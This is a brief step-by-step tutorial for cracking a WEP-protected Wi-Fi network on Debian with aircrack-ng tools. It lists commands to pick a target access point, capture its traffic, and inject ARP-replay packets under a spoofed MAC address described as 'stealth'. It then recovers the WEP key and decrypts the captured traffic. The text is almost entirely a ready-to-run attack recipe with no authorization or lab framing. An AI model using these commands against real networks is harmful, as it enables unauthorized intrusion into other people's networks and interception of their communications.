Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

1. Stop network manager: /etc/init.d/network-manager stop
2. Enter monitor mode: airmon-ng start wlan0
3. Find nearby networks: airodump-ng mon0
4. Identify the target BSSID, SSID and Channel number (-c option below)
5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
   1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
   2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
   3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
8. The WEP key should then be displayed in the terminal window.
9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
10. Exit monitor mode: airmon-ng stop mon0